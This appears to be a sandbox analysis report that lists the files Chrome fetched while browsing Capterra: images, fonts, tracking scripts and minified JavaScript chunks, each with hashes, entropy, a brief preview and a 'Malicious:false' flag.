                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductScreenshot/d6478d12-ac95-43f1-a53a-aa8be1781a2f.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........l....pixi............av1C........colrnclx...........ipma...................mdat........`...B2.......1@.;9....y..i'....Tw.o7.|8".E....K.<.}U.....?.7.....N...$..5.=.......i..P........RE.A.9|.C.]..?.=._1..;.hXS.4...e .r...5..R....!.....}.Nl..6e....^..|:.Id.}}..{`.v..>.g..3.I.,.....:.a.v..:.H`..,z...]7....Cb..\Y.*...e.1........o.....i._u6../.F/.!..{..x..8.$.....>S\O..v.Y......G....db...}. ..2?...'...?U.r.2.o.STc1.8.(....i4E.0.`...Ox.p."..n.......i.8.G...f+-....OR......P...&O.O....q-V...n.&...)n..N..h.s.'..... .^..1..8.5"..9..T..<q..F...&...j....^..G..^..L.........e..<-?S..4........+...Yf3UXi.2.jUZ$....3.c>.N.P)B.8.Y.*..//<..&.....Ihg..8T../..HE..'0..Y...,.6^.UR.V...n.x*=.....n...mm..<.....T.6....E....s{[Ff...i..l, [.....k..q.z..=;.. ..iq..........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13317), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13317
                                                                                                                                                                                                        Entropy (8bit):5.454706754813381
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:btL792ziKXad1mW2BjyhwCoMcRWIF8aH4baTf9z20McqQRFxYyu4Bylw:xfqiKXfbkXqgGf80MuG4Mlw
                                                                                                                                                                                                        MD5:E53CEA0ACBD753EF5403FE1582A917DD
                                                                                                                                                                                                        SHA1:007782C38336B1BF845CC2BA2FAC504A00DA9CEA
                                                                                                                                                                                                        SHA-256:D605C05AEB85FBC19E14FE322E7CB66C4FC230B2A747E40153FA8B9B3AD56E58
                                                                                                                                                                                                        SHA-512:228652AE806F9D2CF93C86FEE1FEE656C5C7AF195936826592A794D8B7F6E1504AAFE85EF7380629FB90DD88F3D84D583216E0EDC51EE30D9E80B7124AC8406C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/5658-95009abf58322653.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5658],{35658:function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"Image",{enumerable:!0,get:function(){return v}});let r=n(84732),i=n(45622),o=n(27573),a=i._(n(7653)),l=r._(n(3458)),s=r._(n(64830)),u=n(84163),d=n(68703),f=n(9273);n(81673);let c=n(1917),p=r._(n(43804)),g={deviceSizes:[640,750,828,1080,1200,1920,2048,3840],imageSizes:[16,32,48,64,96,128,256,384],path:"/assets-capterra-monorepo-bx-capterra-www/_next/image/",loader:"default",dangerouslyAllowSVG:!1,unoptimized:!1};function m(e,t,n,r,i,o,a){let l=null==e?void 0:e.src;e&&e["data-loaded-src"]!==l&&(e["data-loaded-src"]=l,("decode"in e?e.decode():Promise.resolve()).catch(()=>{}).then(()=>{if(e.parentElement&&e.isConnected){if("empty"!==t&&i(!0),null==n?void 0:n.current){let t=new Event("load");Object.defineProperty(t,"target",{writable:!1,value:e});let r=!1,i=!1;n.current({...t,nativeEvent:t,currentTarget:e,target:e,isDefa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 34288, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):34288
                                                                                                                                                                                                        Entropy (8bit):7.9941816021665675
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:uKjF9YG365INB2Po7dQskNCk0st38Ym46HbJQmhpY1:1zYeNj7dQlCk0g385P7pY1
                                                                                                                                                                                                        MD5:71221D6BF4204042B1BBC3902D08A81B
                                                                                                                                                                                                        SHA1:92A10D7982D33E1E216EE8E1AEC79C3AE8BCB8B6
                                                                                                                                                                                                        SHA-256:92443D06835A28423649BCA60E6D755E4A1BD09638443196D58E0DD1F06C827F
                                                                                                                                                                                                        SHA-512:7F68F448A024BDD8E1B46F34F7DDED13D6C02CC46F93E1D72D1AF3D2AC0536B8DAFF6413FBA17C86ED7531FAB88D60C3099B0284B023B0549B1222C163ACAE20
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2
                                                                                                                                                                                                        Preview:wOF2..............<....}..........................=......H?HVAR./.`?STAT.4'2..D/~.......8....0....6.$.... ..n..<..[.)Q".[....Xm.......Mk..@'M.5.....`s.@.......pK.R....BY.6...z....N.g.R....{..YMp.j.*..D..Ib...cxdm."....sl..[.kg.Y).8z.k....#...#*...A6@1.....>.}..z.....ajX.:4-.c.a.....?7..z.|...v....1"*..%..{.......+.+._......rI....B...!Z.SXE..S1**L(edP..].J.h...H.B..<....(.W....(.@.hM..pU;.R?..Lz=....O..w...Q.g-.Uy.t..w....h#..Q.8R...4r.....R.P.m.......ty19..N....."....|9...4.[Nb..#.aR.:.o..:e..D...F.............;bY,$Q.]...O..A....*.<.D.g...F.$!....8. .2fk.'.'J.w.'.z.;.#...t..d.N..........X.(..t.UZ]..P>....~..s.N.g.?@....=3..Q.....1......~].Q..!..$...bp.........=s...A...wAT.K"kJ;DB"..$...E....3.W....]..3..k...gH,.2..@...^._......;DL.c.v.w,....K@..RE.?.kB....ko................t.>.....?.-...Y.r.b^~...x....t..................n.k..|^....]...^*<.......Kk.......`0.../.zS.q........{..r.).of.1.,......Y..r..C...gxN.E...}...JYnl.R......n.;M3....)4.q.....09.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5050
                                                                                                                                                                                                        Entropy (8bit):7.941050661935206
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:o9MceM3nz+t7FfnQdIu8ydx9Rh/2DxeeFmbt6fzSStjikBqFzpeM+lS4gl:omVM3z+Tv48ytYFFmbMgilSr
                                                                                                                                                                                                        MD5:028BB5ED2DCB610B565EAFDA8105F6F5
                                                                                                                                                                                                        SHA1:D0B972DCEC2B73A2A316B8A1BFB22784FD5E3A21
                                                                                                                                                                                                        SHA-256:07FC49E00381E687AA2D8818C108C37B7FA47B8456F6D17E0485FD793460D14C
                                                                                                                                                                                                        SHA-512:9776EAB8D304843842202D0E966A2575470238EAC39FCAF7D8A03720933903A26ECD5DF3CED63262C8D73AF033DCD12A72C1EF2B7346853D71B336B3B3B9EBC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB........tIDATx^.ilTYv..}.{U....h04.@.....f..J...'.).I.&#Mf.)R...(..L.HQf4i.23.$J./`..iz.7....Y..z..7..^.*...z.g..Z...}...9...c.e.zB....'.B.DVh.....Y.}"+.Od.....>...'.B.DVh.....Y.}"+.Od.....>...'.B.DVh.`..U.)..D.i@... %....X..:R...`M..K..7).`...dY.........X..i.....U0.)..-*.f.<.F..i..v.....:.,.....E.N.......d.fS..2..T..VU..9u.>....i.....10M.k.Bf."..._..2.......v...o.y.*..|.43.MZ.y..E.+l)........G....q.4...e.x..aU.6n....=~<...............3.,G....>..}k...Bk7nD.._P.?.....aZ.`. `.2....H..9+.?g....c<....Y..a0'q/B.M...&.....+2.....O.y...Z.u3...$s.;.u...5...;..0....F..N..-...E..g......?.kf.T0..........i..L..8y.y...@I.f=~l..D....].?Z.g....FKh.........9*c.#afQ..u.W\L.$.....>..5u_.u..............<9..p..........=.H(...,.ss.s..d...L.-Wa0.<d.077.o..)(..B... -.a......0.......B...-,L...)Qd...%......2j..,..=.<.3?..g..#M....._m$.WV....d(.B.B.g.L.....q.".k..M..^+..........v.q................f...ssC.._..c....9!m..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 128x128, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3311
                                                                                                                                                                                                        Entropy (8bit):7.803708287150388
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Qie+jWcspX2Pp+q5toajqsxBFBeK41hpOlTojUsmzZ:Q2PSqpLtoaGsbFBedJGsi
                                                                                                                                                                                                        MD5:66520F0B877C4B09317D57E3B1424471
                                                                                                                                                                                                        SHA1:C8B4F68F67344955F5053EE429AF8DA0D369ACBD
                                                                                                                                                                                                        SHA-256:7AE360E8451C4A668B9B8EAC31EB2F52588B9E10D3C3F56F914CA0E7B9674927
                                                                                                                                                                                                        SHA-512:83F679E4F5101390F7289ACA3E2877624E80B24F91C27539387C9B21571B26F925519B2175E4E37321BEC36315B6FF122D1D2141D0D72E71B8ACC434BA143DE6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\..........."..........9..................................................................................0...a.3x.\P...s.T6..l.}..L.N...=.}!]...W...6..rz...0....[..:\....q..B.......j......[b3.ms../z..BY...$..)mB....Bk.8>.a%RL1.......rx.h....-.r....+.=..n..r.l....,.,.J..7T.g.~..5|.5........*..}.?C............%.........................0... .P..!.............\.>*.;ly...............w...F.S.I..J........x7.k...n3mN.-..P_ a..3........`..|...1.>t.*.C$.A.:cX...Z...n`O..qQ..7h..d.....U...r...kV.y[..<..!.[..#(S._.z.j.........:..b/.[2~4.....y.e.q..J...N..U...!..km.w.R....i....@q!r...z....y..D..v....D.......@.....!......q.....;...k.B.Q..!.&..... ..:.O..!. +..xm@.\..4.t0B.`9.^`.wN.M..^V.?.*....N{..._..B......|.;-..Fz.rH...^..f-!.\..:.q#.u....5.~<L.b.Yf.==...0~E.....M]..#9..A_SM.1.$.k...kX........N.b..E....=w
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):42
                                                                                                                                                                                                        Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                        MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                        SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                        SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                        SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://adservice.google.com/ddm/fls/z/dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=*;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12808
                                                                                                                                                                                                        Entropy (8bit):3.833710566534228
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Pk20wRyjaKzQ6SsLDBjE1vPBDELW3acUWL85rGjPxqOn0ahwKLBmpHKbX7O0bo:Pk2RyjDzjSMNEJRacUWN9qOn0ahw1PH
                                                                                                                                                                                                        MD5:AA3A6F9864F4FEA8E231A93FBDF3439E
                                                                                                                                                                                                        SHA1:A2BA5673B2F1191518F0D4D784AE3AD3CCC8882C
                                                                                                                                                                                                        SHA-256:74AF4CDACE06A37CD37510DDD273E1C0E55CAF7B678CADD9B55B65F9B5F25C39
                                                                                                                                                                                                        SHA-512:BB8EF23472353641D048E09585FE27D71B1813F0CD3E2146C504AB3FE210ACC7395C0B0EC082D877F751AF2E606A14211C3A8D247B660DD7B530C82A3B4C9A1A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<svg width="180" height="40" viewBox="0 0 180 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.416626 14.7072L16.8372 14.7096L26.8223 14.7121V4.7182L0.416626 14.7072Z" fill="#FF9D28"/>.<path d="M26.8224 4.71837V40L39.2927 0L26.8224 4.71837Z" fill="#68C5ED"/>.<path d="M26.8222 14.7122L16.8372 14.7097L26.8222 39.9999V14.7122Z" fill="#044D80"/>.<path d="M0.416626 14.7076L19.3979 21.1992L16.8372 14.71L0.416626 14.7076Z" fill="#E54747"/>.<path d="M60.9073 30.7118C60.7627 30.8579 60.521 31.0407 60.1833 31.2604C59.8456 31.48 59.4059 31.6985 58.8629 31.9181C58.3199 32.1366 57.6567 32.3255 56.8732 32.4838C56.0897 32.6421 55.1908 32.7207 54.1789 32.7207C52.2257 32.7207 50.5372 32.4041 49.1148 31.7709C47.6923 31.1377 46.5165 30.2541 45.5884 29.1215C44.6604 27.9888 43.9789 26.6488 43.5453 25.1026C43.1116 23.5564 42.8942 21.8568 42.8942 20.005C42.8942 18.1545 43.1286 16.4426 43.5999 14.8719C44.07 13.3011 44.7758 11.9427 45.716 10.7977C46.6562 9.65281 47.832 8.75823 49.2423 8.11275C50
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (35552), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):35552
                                                                                                                                                                                                        Entropy (8bit):5.272922801597397
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:zeUUsSi7WTPK47rBtSTECq0XBkpurOMiQvNvvFJcXkryfGvWzo2t8YnO676kg5+n:pYichBgol0XadAvFgOvHzUW7S
                                                                                                                                                                                                        MD5:C6F58DD3D60F07462254B842DD4F9CA1
                                                                                                                                                                                                        SHA1:62C507FC6CC05F9732BCD5C593F3D8D0E0A3D7E2
                                                                                                                                                                                                        SHA-256:2A8A441D8086F20A64563EDC759ABA1DE84D932E34FF77B8BB0279A730CDB428
                                                                                                                                                                                                        SHA-512:21BF35D36D4859188BF32B21F84B71975B72503C72F5B64D7AB98CEFB58045F3F991960CAF9E8BCC95CDC284C6758DB639B4087750206450076263677CA4513B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{"+MLx":function(t,e,n){var r=n("HAuM");t.exports=function(t,e,n){if(r(t),void 0===e)return t;switch(n){case 0:return function(){return t.call(e)};case 1:return function(n){return t.call(e,n)};case 2:return function(n,r){return t.call(e,n,r)};case 3:return function(n,r,o){return t.call(e,n,r,o)}}return function(){return t.apply(e,arguments)}}},"/GqU":function(t,e,n){var r=n("RK3t"),o=n("HYAF");t.exports=function(t){return r(o(t))}},"07d7":function(t,e,n){var r=n("busE"),o=n("sEFX"),i=Object.prototype;o!==i.toString&&r(i,"toString",o,{unsafe:!0})},"0BK2":function(t,e){t.exports={}},"0Dky":function(t,e){t.exports=function(t){try{return!!t()}catch(e){return!0}}},"0GbY":function(t,e,n){var r=n("Qo9l"),o=n("2oRo"),i=function aFunction(t){return"function"==typeof t?t:void 0};t.exports=function(t,e){return arguments.length<2?i(r[t])||i(o[t]):r[t]&&r[t][e]||o[t]&&o[t][e]}},"0eef":function(t,e,n){"use strict";var r={}.propertyIsEnumerable,
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9985)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11145
                                                                                                                                                                                                        Entropy (8bit):5.359425009481445
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ebvcZuS5tmjHC/tM0fVUISMVnRNIN0Y1oZD5Z:ebvcuRjENfVUvN11oZD5Z
                                                                                                                                                                                                        MD5:B30F074CD7F59B1B60B0526838DAE4CF
                                                                                                                                                                                                        SHA1:99E5E522374E5B854CB162D244482CEDE09E48A2
                                                                                                                                                                                                        SHA-256:6180CE88C634D9DA036B03B3E25EE5453D39299A045F125E001332E33655EEB8
                                                                                                                                                                                                        SHA-512:695106F151EE0D9D8D8141B52CAFB80D623EAA36F0499CD45BF15F8BC5CB45CD66445B3F7A485DCD2B2202E8158BFAA488D7F0F703CC0F87288DC0CBE9EB75FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:window.hjSiteSettings = window.hjSiteSettings || {"site_id":2431713,"r":0.4663716178902116,"rec_value":0.205,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":true,"session_capture_console_consent":false,"anonymize_digits":true,"anonymize_emails":true,"suppress_all":false,"suppress_all_on_specific_pages":[],"suppress_text":false,"suppress_location":false,"user_attributes_enabled":true,"legal_name":null,"privacy_policy_url":null,"deferred_page_contents":[],"record_targeting_rules":[],"feedback_widgets":[],"heatmaps":[],"polls":[],"integrations":{"optimizely":{"tag_recordings":false},"abtasty":{"tag_recordings":false},"mixpanel":{"send_events":false},"unbounce":{"tag_recordings":false},"google_optimize":{"tag_recordings":false},"hubspot":{"enabled":false,"send_recordings":false,"send_surveys":false}},"features":["settings.billing_v2","survey.embeddable_widget","feedback.widgetV2","survey.type_button","survey.screenshots"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):236306
                                                                                                                                                                                                        Entropy (8bit):5.528009440370215
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:BSAdB6siANEG6D4j4cMz4aHlEZtNAJ0bb:gAv6sHNMVHWbb
                                                                                                                                                                                                        MD5:BAD304871CFDFEA392958A74964BB30F
                                                                                                                                                                                                        SHA1:5F399763C2E441529E71294B83C1B4EB574338AC
                                                                                                                                                                                                        SHA-256:000F72C979E59920B8537BF522CE41B0174F096ED01ADDCE6A9354B298579295
                                                                                                                                                                                                        SHA-512:8894A88FE88EB7877EAE63B7ECB0A340B536FAF62E24DA426B6C3C478822635E55469C73A5D7F47C645C248DFDFF67F15D8908D70B6303D94C1ADFDE51C838D4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__cid",[46,"a"],[36,[17,[13,[41,"$0"],[3,"$0",["require","getContainerVersion"]],["$0"]],"containerId"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__cid":{"2":true,"4":true,"3":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__cid":{"read_container_data":{}}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__cid".,."__e"..]...}....};.....var ba,ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (27662), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):27670
                                                                                                                                                                                                        Entropy (8bit):5.433430624649288
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Qm2SRuvi3w2mhLhJhew0jaoxo0+QCNXxGxVpL60m/YeF4CAn1A:s2sQeBG8
                                                                                                                                                                                                        MD5:9C07E45B7E639FBCC445886195080EFC
                                                                                                                                                                                                        SHA1:FA5CB7398D959E54CA5BE95818A2E122F233C2D0
                                                                                                                                                                                                        SHA-256:3B720754D614D7B4506ABD37FDCE8D6729C29A1B464FDC3375B140BA4BFFD52A
                                                                                                                                                                                                        SHA-512:06BE8323ECFE7E372B6E7CE4DC325F27B924AF052B318F9AD353C089651F3040D354A6356624A299760735EB6B48F7CAFEB7E34E1BAD48D372E598C6590688C4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4977],{8271:function(e,t,n){n.d(t,{z:function(){return N},Z:function(){return b}});var s=n(27573),a=n(38458),i=n(62780),l=n(57908),r=n(34617),o=n(19942),d=n(7653),c=n(81731),m=n(32012),x=n(78713),u=n(84318);let v=e=>({name:"engagement_product_click",engagement_component:"review-card",engagement_destination:e?"expand_review-card":"collapse_review-card",engagement_details:e?"text-button_expand_review-card":"text-button_collapse_review-card"}),p={name:"engagement_hover",engagement_component:"review-card",engagement_destination:"show_rating-breakdown",engagement_details:"tooltip_overall-rating"},h={name:"engagement_hover",engagement_component:"review-card",engagement_destination:"show_tooltip_incentivized",engagement_details:"chip_tooltip-incentivized"},g=e=>{let t,n;return"linkedin"===e&&(t="show_tooltip_linkedin-verified",n="chip_tooltip-linkedin-verified"),"non-anonymous"===e&&(t="show_tooltip_non-anonymous-verified",
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 128x108, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5033
                                                                                                                                                                                                        Entropy (8bit):7.878088633229121
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:53eu/G29D6LxU547kybjBeiYTJCXftyDOZukkn5nHo/32yK3TrlZhs:51/Pz44yHGCXVUb5HMpKTrl/s
                                                                                                                                                                                                        MD5:484B75C3A9852A5A0E23ECF58C974A58
                                                                                                                                                                                                        SHA1:841D33AE643E6C06BDD71130F8014014E876D37C
                                                                                                                                                                                                        SHA-256:04E52F30C2C78ABD271184A4FAEDC2B9D43471481282F7072C11516C830E0C2B
                                                                                                                                                                                                        SHA-512:926497B41F5814730D171113703320AA0AF5E40C94F8264BC3F098F357B6B9B50CAB7EDFA8A25CCD16F9CCA339A33EC4D4413D99708DE30262D25937D340B265
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\......l...."..........7....................................................................]^=....F...\../s}.{.v0....~.2..-r].q...x.$....].u...;^....'\..i.t..Z..]F..sN.. *.....6I.......`[......'5..M.#.}."...y.2...x.(.....7\..f..r[F.....X../.k..j[...{....k{.lr.....l....F.YI.g...g.X......]v.geg.9..S...;....J..,..z.?z...}.-sg......].+....c.......C.&lK..W...*....u..^.O;.P...g...2._.-......u.$|.z(........P%...+............................. !"1...26.#%.............:.....(.&J..l.;....x.i..r.;L.sHTf....9..y".r..UE..Ms\...#...-o.H".=.q*L...(...{...(..`...j..*..<..M7.........Zk..z\.3H.d7"..?.6.....+e4\...i.....+,.]..Z....S[9..}.@..H.#+..M.....9[.1.'..^.q..du..H.CGiQ:W]......_....4.....!F...1T.E|.i..x.uq..3.[.pFu".Q4O.....%3S.c.e.q.....ac[....v>.lb....#.)3.k.9."g4..a..Hz..&.$...(2X...u.."...y-..!I`.x.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 500x374, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):17632
                                                                                                                                                                                                        Entropy (8bit):7.949997398074455
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:oVfTjcUukRKkPSbZZmwsKx0l8+st3/XetHLLO:UfTjcUukRI/mw90O+o/OtHnO
                                                                                                                                                                                                        MD5:BE9E7E58AEBBB14880B8D0281FCC6F6A
                                                                                                                                                                                                        SHA1:E9A5B417BCE04A7EC97AD165D300A316286CD05B
                                                                                                                                                                                                        SHA-256:A6DB69CBD5DFFA94028B0273598C93EEDDE6A8B773169D274088544C1522F347
                                                                                                                                                                                                        SHA-512:4C1985BB4096FF85265EE699E00E39A70138E500720147E64F8AD04589CF887EE9356E1413128344D3D3ADD43F150C1D2E956D8DF6DB2DDFCC55CE3A1BD95BC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/nhph2-p-500.jpg
                                                                                                                                                                                                        Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......v...."........................................W............................!1Q..ARaq"23.....Sbr.....#4BT...$7CUcs....Dt.&56Ed...%'e.................................5.......................!..1Q..2A3aq."....R...#B...b............?................fM..iq...+.!.6.....hk@h..,.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r^^.}o.H.#.....r.,l.........".".2X..om...T.D@DD.D@DD.D@DD.D@D&..\E...P^../.._.......i....^.....-t...h..;.._.........Q..z.@..%...._....%..6w.x7@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD..vx.r.nP...>.+w ." ""." ""." ""." .M.]....l..Y.....&/..#....c.l.v........2....]....B..a.9.l..w..1jFTe.\.1K....to.{s.M.#~..>.]......|._.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 128x128, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4642
                                                                                                                                                                                                        Entropy (8bit):7.875495841149435
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:r5/ZxsuisIRy7rSv9q17jKIMniAeSF9LUP1kSzmo3R4fj:dwA7e1niwFGFzmuR4fj
                                                                                                                                                                                                        MD5:3352C9DCE0AC2A6AA15A0A96119B9270
                                                                                                                                                                                                        SHA1:16E8B7C14DF20C65235F4F65991D8F55F8E79462
                                                                                                                                                                                                        SHA-256:5A504D6623C8928BA14585F8F6C34354CB0E104ED7ABFEEEFD4F0C61E9986701
                                                                                                                                                                                                        SHA-512:8FC0E6B3974BD534E672A2210A25EF35A332189A391FC8F6ACD26734E1F4AE27878E744382EE2DCA0B93A6B22A8B93853D990FB66B15CF134E49D7C4D0921A42
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
